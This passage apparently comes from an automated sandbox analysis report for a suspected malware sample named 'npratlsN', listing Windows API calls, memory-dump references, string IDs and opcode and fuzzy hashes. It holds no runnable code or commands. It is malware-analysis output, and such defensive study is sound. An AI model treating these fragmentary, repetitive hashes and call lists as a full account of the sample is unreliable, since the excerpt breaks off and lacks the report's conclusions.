                                                                                                                                                                          APIs
                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0290955A), ref: 029094F2
                                                                                                                                                                          • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0290955A), ref: 029094F8
                                                                                                                                                                          Strings
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DateFormatLocaleThread
                                                                                                                                                                          • String ID: yyyy
                                                                                                                                                                          • API String ID: 3303714858-3145165042
                                                                                                                                                                          • Opcode ID: dcec2dfc6a13505ac5c534e8473691437e2f5590584be654e5e061e24937c6a2
                                                                                                                                                                          • Instruction ID: 1ed56e1d8f8c8c9a646a7d0b7704adcdbe77b51d8ecff3296df2380d226c564f
                                                                                                                                                                          • Opcode Fuzzy Hash: dcec2dfc6a13505ac5c534e8473691437e2f5590584be654e5e061e24937c6a2
                                                                                                                                                                          • Instruction Fuzzy Hash: 75215175A0421C9FEB11DF95C8C1AAEB3F9EF88B10F4100A5ED45D7291D7309E40CBA5
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 02918018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02918088,?,?,00000000,?,029179FE,ntdll,00000000,00000000,02917A43,?,?,00000000), ref: 02918056
                                                                                                                                                                            • Part of subcall function 02918018: GetModuleHandleA.KERNELBASE(?), ref: 0291806A
                                                                                                                                                                            • Part of subcall function 029180C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02918148,?,?,00000000,00000000,?,02918061,00000000,KernelBASE,00000000,00000000,02918088), ref: 0291810D
                                                                                                                                                                            • Part of subcall function 029180C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02918113
                                                                                                                                                                            • Part of subcall function 029180C0: GetProcAddress.KERNEL32(?,?), ref: 02918125
                                                                                                                                                                          • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,0291820E), ref: 029181F0
                                                                                                                                                                          Strings
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                                                                                                                          • String ID: FlushInstructionCache$Kernel32
                                                                                                                                                                          • API String ID: 3811539418-184458249
                                                                                                                                                                          • Opcode ID: fdddbe6c95b2fc7c89a4d2ca4a842d96569bcf3bece1d2d54b2f6bcefabbf3c8
                                                                                                                                                                          • Instruction ID: 3b1c5f2dabe80ef30bdf090a15d99f95abe57f7d7fe47cbde8daf28a86b699b2
                                                                                                                                                                          • Opcode Fuzzy Hash: fdddbe6c95b2fc7c89a4d2ca4a842d96569bcf3bece1d2d54b2f6bcefabbf3c8
                                                                                                                                                                          • Instruction Fuzzy Hash: D501AD30A4430CAFFB01EFA5DC81F6A37EEFB89B00F514860FA00C3280C634AD109A60
                                                                                                                                                                          APIs
                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000004), ref: 0291AD90
                                                                                                                                                                          • IsBadWritePtr.KERNEL32(?,00000004), ref: 0291ADC0
                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000008), ref: 0291ADDF
                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000004), ref: 0291ADEB
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Read$Write
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3448952669-0
                                                                                                                                                                          • Opcode ID: a93baf0632f810e868fc304dc02f88cb2819ea7b8e0cd4cec62af5963c9676e9
                                                                                                                                                                          • Instruction ID: d68c4dbc2454b0bd8de5f843a16fe1085dade7178d4ee6c735982c217ee3d17a
                                                                                                                                                                          • Opcode Fuzzy Hash: a93baf0632f810e868fc304dc02f88cb2819ea7b8e0cd4cec62af5963c9676e9
                                                                                                                                                                          • Instruction Fuzzy Hash: 5E21AFB564161D9BDB10DF6ACC80BAE73A9EF80321F008111EE5097380EB34ED61DAA4

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:8.3%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:47.8%
                                                                                                                                                                          Signature Coverage:14.1%
                                                                                                                                                                          Total number of Nodes:404
                                                                                                                                                                          Total number of Limit Nodes:33

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                                                                                                          • _getenv.LIBCMT ref: 00401ABA
                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                                                                                                                          • Module32First.KERNEL32 ref: 00401C48
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
                                                                                                                                                                          • Module32Next.KERNEL32(00000000,?), ref: 00401D02
                                                                                                                                                                          • Module32Next.KERNEL32(00000000,?), ref: 00401DB6
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00401DC4
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                                                                                                          • FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
                                                                                                                                                                          • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                                                                                                          • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                                                                                                          • _malloc.LIBCMT ref: 00401EBA
                                                                                                                                                                          • _memset.LIBCMT ref: 00401EDD
                                                                                                                                                                          • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3047680567.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000008.00000002.3047680567.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000008.00000002.3047680567.000000000043F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_npratlsN.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                                                                                                          • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                                                                                                          • API String ID: 1430744539-2962942730
                                                                                                                                                                          • Opcode ID: 5b8530bddefb045e1b9ab2db406c8ab4da3f0b02880ef73395902e6a9a04ea37
                                                                                                                                                                          • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                                                                                                          • Opcode Fuzzy Hash: 5b8530bddefb045e1b9ab2db406c8ab4da3f0b02880ef73395902e6a9a04ea37
                                                                                                                                                                          • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                          • API String ID: 0-1487592376
                                                                                                                                                                          • Opcode ID: 966b6c0996f673ef584c2020564a89728e0dbd9b7d20364b7d43ab6ae4ee507c
                                                                                                                                                                          • Instruction ID: 8e013f29834240157f18b38fc26129d7a4ee526f42207de144c65b832f1d3663
                                                                                                                                                                          • Opcode Fuzzy Hash: 966b6c0996f673ef584c2020564a89728e0dbd9b7d20364b7d43ab6ae4ee507c
                                                                                                                                                                          • Instruction Fuzzy Hash: 83E1FC74E00218CFDB14CFA9D984A9EBBF2BF48311F158069E919AB366DB35E941CF50

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                          • API String ID: 0-1487592376
                                                                                                                                                                          • Opcode ID: e4cdaf6e58e357b7d3aac96e97ee2005f63890b151fb822da7e41ea387d069e2
                                                                                                                                                                          • Instruction ID: 7e04e2217b60b2be6fcd5d80c7fe5166b1ed90c5d08877278cd161038268d659
                                                                                                                                                                          • Opcode Fuzzy Hash: e4cdaf6e58e357b7d3aac96e97ee2005f63890b151fb822da7e41ea387d069e2
                                                                                                                                                                          • Instruction Fuzzy Hash: 1A81B474E00258CFDB14DFAAD994A9EBBF2BF88310F14D069E809AB365DB349941CF10

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                          • API String ID: 0-1487592376
                                                                                                                                                                          • Opcode ID: a5006900a104f9d172506f792600c26b203fae7b7dc1da87cbd7b227a4dec374
                                                                                                                                                                          • Instruction ID: b3bad9ed4face5dbb21981df9b837e00489b6423abfdd98b430bfb928e7924af
                                                                                                                                                                          • Opcode Fuzzy Hash: a5006900a104f9d172506f792600c26b203fae7b7dc1da87cbd7b227a4dec374
                                                                                                                                                                          • Instruction Fuzzy Hash: B681B574E01218CFDB14DFAAD994A9EBBF2BF88300F14C069E849AB365DB349945CF50

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                          • API String ID: 0-1487592376
                                                                                                                                                                          • Opcode ID: 2e908455d368d5d5434e90e2b2baa6b099b9da22913e3eab6ae735ce3c235d20
                                                                                                                                                                          • Instruction ID: 083ccfd13de712349e65438e2c6bfb38d359048ec47ead857cd9b05cfa8c1c09
                                                                                                                                                                          • Opcode Fuzzy Hash: 2e908455d368d5d5434e90e2b2baa6b099b9da22913e3eab6ae735ce3c235d20
                                                                                                                                                                          • Instruction Fuzzy Hash: 7681A674E00258CFDB54CFA9D994A9EBBF2BF88300F14D069E418AB365DB349985CF50

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                          • API String ID: 0-1487592376
                                                                                                                                                                          • Opcode ID: 670bd8960b14c16ab28a33c4ba315df67dc1091d509e8edcf6a66aeb754d1d4b
                                                                                                                                                                          • Instruction ID: 8081d7f791ac4625ee6e401b17f16b1a164c6865c4be6d3e1cacd8eebb89b494
                                                                                                                                                                          • Opcode Fuzzy Hash: 670bd8960b14c16ab28a33c4ba315df67dc1091d509e8edcf6a66aeb754d1d4b
                                                                                                                                                                          • Instruction Fuzzy Hash: FB819474E01258CFDB14DFA9D994A9EBBF2BF88300F14C069E819AB365DB349985CF50
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                          • API String ID: 0-1487592376
                                                                                                                                                                          • Opcode ID: 082f43cfcf42e9470d90dd104716f4fa0167a56877cc3e09a59be871df9216a8
                                                                                                                                                                          • Instruction ID: 8f3a04cb4bb383d8cca7d19d60aec62bbeb6eadd9b157455626b2897926d4e6a
                                                                                                                                                                          • Opcode Fuzzy Hash: 082f43cfcf42e9470d90dd104716f4fa0167a56877cc3e09a59be871df9216a8
                                                                                                                                                                          • Instruction Fuzzy Hash: 3A819674E01258CFDB14DFAAD994A9EBBF2BF88300F14C069E819AB365DB349945CF50

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                          • API String ID: 0-1487592376
                                                                                                                                                                          • Opcode ID: 154143d0e0a3446eba7e2a93b0f9c7f8fedf0f9fbbb971e4aed5f7cdd7e5dffe
                                                                                                                                                                          • Instruction ID: 31819c229d11bebad8617164af027150ae1d3c8495a19b2279579ab529a5c404
                                                                                                                                                                          • Opcode Fuzzy Hash: 154143d0e0a3446eba7e2a93b0f9c7f8fedf0f9fbbb971e4aed5f7cdd7e5dffe
                                                                                                                                                                          • Instruction Fuzzy Hash: 53817274E00258CFDB14DFAAD994A9EBBF2FF88310F148069E819AB365DB349945CF50

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: cdf4e3696b6a19497483c36e6bc43641ae01d2971d60ce49a77842c19b9782a0
                                                                                                                                                                          • Instruction ID: d0e082f7fe16b5e912667011d23adf4428583313d775b6a223785b92e2b4606b
                                                                                                                                                                          • Opcode Fuzzy Hash: cdf4e3696b6a19497483c36e6bc43641ae01d2971d60ce49a77842c19b9782a0
                                                                                                                                                                          • Instruction Fuzzy Hash: 6DD1A074E00218CFDB54DFA9C990B9DBBB2BF89300F1085A9D909AB3A4DB359D85CF51
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089514926.000000002C890000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C890000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c890000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: 4c2cf36a01989b9ecf938ea1addb0b6c0f1d967e9a5ab2f461b01c9859c81f99
                                                                                                                                                                          • Instruction ID: c0c975e3d1538802cf23b082d15bbb78038d936220a1b96237b5dee4fb4db86a
                                                                                                                                                                          • Opcode Fuzzy Hash: 4c2cf36a01989b9ecf938ea1addb0b6c0f1d967e9a5ab2f461b01c9859c81f99
                                                                                                                                                                          • Instruction Fuzzy Hash: C9D1A074E01218CFDB54DFA9C990B9DBBB2BF89300F1081A9D909AB3A4DB359D85CF51
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089414791.000000002C880000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C880000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c880000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: 6bbe839d597f09f95ea459a080d86525397eee4153a6d9d7c6818d5ddcfa0ef4
                                                                                                                                                                          • Instruction ID: d089f2f57b294ea97348d3df3893d2c80ad469ad978b27031e456a5d800aa7f0
                                                                                                                                                                          • Opcode Fuzzy Hash: 6bbe839d597f09f95ea459a080d86525397eee4153a6d9d7c6818d5ddcfa0ef4
                                                                                                                                                                          • Instruction Fuzzy Hash: 9FC1A174E01258CFDB54DFA5C994B9DBBB2BF88300F2081A9D809AB355DB359E85CF50
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089514926.000000002C890000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C890000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c890000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: 5cbdee5ad0505c60f86c06796f39073b2f4bbf0c431104385be3dfd0e7acfcb4
                                                                                                                                                                          • Instruction ID: 5f7862aa340347f65f0bbd18fa8e3b9a1e779420d97fc48ba499447cc4e3198c
                                                                                                                                                                          • Opcode Fuzzy Hash: 5cbdee5ad0505c60f86c06796f39073b2f4bbf0c431104385be3dfd0e7acfcb4
                                                                                                                                                                          • Instruction Fuzzy Hash: 2FC1C274E00218CFDB14DFA5C994B9DBBB2BF89300F2081A9D809AB395DB359E85CF51
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089414791.000000002C880000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C880000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c880000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: ;{+
                                                                                                                                                                          • API String ID: 0-1662407290
                                                                                                                                                                          • Opcode ID: 32954dace73d4b26e377411f589fb2272c06db01b66f44e52b3fd079cddefe9f
                                                                                                                                                                          • Instruction ID: 875631aace55e3f9b9fba57dc39e7636eeec9b99c3184babbb1ee34d86c99ee2
                                                                                                                                                                          • Opcode Fuzzy Hash: 32954dace73d4b26e377411f589fb2272c06db01b66f44e52b3fd079cddefe9f
                                                                                                                                                                          • Instruction Fuzzy Hash: 4AA1F370D00218CFEB14DFA9C994BEDBBB1FF89300F209269E509AB295DB749985CF50
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089414791.000000002C880000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C880000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c880000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: ;{+
                                                                                                                                                                          • API String ID: 0-1662407290
                                                                                                                                                                          • Opcode ID: c0973dddc610c77ccb97457efdb9162ec97ec0c3589ca0e2a04851e506d58aac
                                                                                                                                                                          • Instruction ID: 288e4cf5c3066405fc8e96c2455273550e25ecb1ae67273bea71bdf2011be1f4
                                                                                                                                                                          • Opcode Fuzzy Hash: c0973dddc610c77ccb97457efdb9162ec97ec0c3589ca0e2a04851e506d58aac
                                                                                                                                                                          • Instruction Fuzzy Hash: DDA11370D00218CFEB14DFA9C984BEDBBB1FF89300F209269E519A72A5DB749985CF50
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089726295.000000002C900000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C900000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c900000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: 7c2403058b79c5a18af4fc8a692ed01b45699651d2107a552126dfb747102d9f
                                                                                                                                                                          • Instruction ID: 7a97ba610fac68cc52555b206c1a1faf966a7ef191e755feed21e6e7201962bd
                                                                                                                                                                          • Opcode Fuzzy Hash: 7c2403058b79c5a18af4fc8a692ed01b45699651d2107a552126dfb747102d9f
                                                                                                                                                                          • Instruction Fuzzy Hash: E5513DB5D042189FDF04CFBAD8646DEBBB6EBAA310F14E8A9D404A7205DB341946DB50
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090073724.000000002C940000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C940000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c940000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: 1b3f4b6cfc2f4fd3b688a3603f96c20b821c8ed6c8b61d4f763158792c848b44
                                                                                                                                                                          • Instruction ID: 247b39aa879dae27540d7cb1cff6a14139965a7e3136760e9164ba9174bde539
                                                                                                                                                                          • Opcode Fuzzy Hash: 1b3f4b6cfc2f4fd3b688a3603f96c20b821c8ed6c8b61d4f763158792c848b44
                                                                                                                                                                          • Instruction Fuzzy Hash: C081B374E00258CFDB14DFA9D990ADEBBB2BF88304F608169D404BB398DB359986CF50
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090073724.000000002C940000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C940000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c940000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: 8c4be27c265489783685b98e6a850f71f76527f2ef16f8aaf8566ec6e6dbc567
                                                                                                                                                                          • Instruction ID: ac06ba0c35aabbcf24a3be469d80721ca58a3827783ed5eb535d9cfe55803219
                                                                                                                                                                          • Opcode Fuzzy Hash: 8c4be27c265489783685b98e6a850f71f76527f2ef16f8aaf8566ec6e6dbc567
                                                                                                                                                                          • Instruction Fuzzy Hash: AF81B274E00258CFDB14DFA9D990AEDBBB2BF88304F608169D405BB398DB359986CF50
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090073724.000000002C940000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C940000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c940000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: 2b80463b50cd103ea36d6323473711f1273e0413eefff78f0fdad5c8e0c1512f
                                                                                                                                                                          • Instruction ID: 78935e2658baff917b536fb1a95f2c025b6783ea5a7e0a2a738b271b8cd4329d
                                                                                                                                                                          • Opcode Fuzzy Hash: 2b80463b50cd103ea36d6323473711f1273e0413eefff78f0fdad5c8e0c1512f
                                                                                                                                                                          • Instruction Fuzzy Hash: 6781B274E00259CFDB14DFA9D990ADDBBB2BF88300F608169D405BB398DB359986CF50
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090164707.000000002C950000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C950000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c950000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: b627ca57743f716e8d80a65e3ad1900a6c85b7877ccb59cbf12b11ddcea10145
                                                                                                                                                                          • Instruction ID: 5af82fa04f4fc623e62f54929bd06117686f0786d8c0a86097b47999e4325626
                                                                                                                                                                          • Opcode Fuzzy Hash: b627ca57743f716e8d80a65e3ad1900a6c85b7877ccb59cbf12b11ddcea10145
                                                                                                                                                                          • Instruction Fuzzy Hash: EA81B374E01258CFDB14DFA9D990ADDBBB2BF88300F608569D405BB398DB359986CF50
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089514926.000000002C890000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C890000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c890000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: cd83da0d0c289542db27022ef6baafdd6d4046d22b5b6c6698e1118c86a75e83
                                                                                                                                                                          • Instruction ID: f073d893db7f06c279c1ec9c50fc8e99614f83d97f8f90c83e8bf04506c81008
                                                                                                                                                                          • Opcode Fuzzy Hash: cd83da0d0c289542db27022ef6baafdd6d4046d22b5b6c6698e1118c86a75e83
                                                                                                                                                                          • Instruction Fuzzy Hash: D741B2B0D01218CBEB54DFAAC9447DEBBF2BF89304F20D169D418AB294DB355A46CF54
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089514926.000000002C890000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C890000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c890000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: f1e00937896e707bf44f9b01da41a41d7df83975d12ca0bb252bfdb198c9cdbc
                                                                                                                                                                          • Instruction ID: c80afa75a5514b800276e2750578c80f7f6dd3cba1bd8d6e14bbc1c9b9a8ac19
                                                                                                                                                                          • Opcode Fuzzy Hash: f1e00937896e707bf44f9b01da41a41d7df83975d12ca0bb252bfdb198c9cdbc
                                                                                                                                                                          • Instruction Fuzzy Hash: 8441C4B0E01658CFDB08DFAAD9506DEFBF2AF89304F24D529D409AB264DB345946CF50
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089514926.000000002C890000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C890000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c890000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: e9ff550f2b5394153c80ff5809b9db3b2e0a48a3d5510880f986bb84a2b6b579
                                                                                                                                                                          • Instruction ID: 64cca8cdd8522839ae5ed81b150e70695cd6231ca8918fc83174a3036a70e9e0
                                                                                                                                                                          • Opcode Fuzzy Hash: e9ff550f2b5394153c80ff5809b9db3b2e0a48a3d5510880f986bb84a2b6b579
                                                                                                                                                                          • Instruction Fuzzy Hash: 9F41B370E05258CFDB18DFAAD940ADEFBF2AF89300F20D129D408AB265DB345946CF95
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
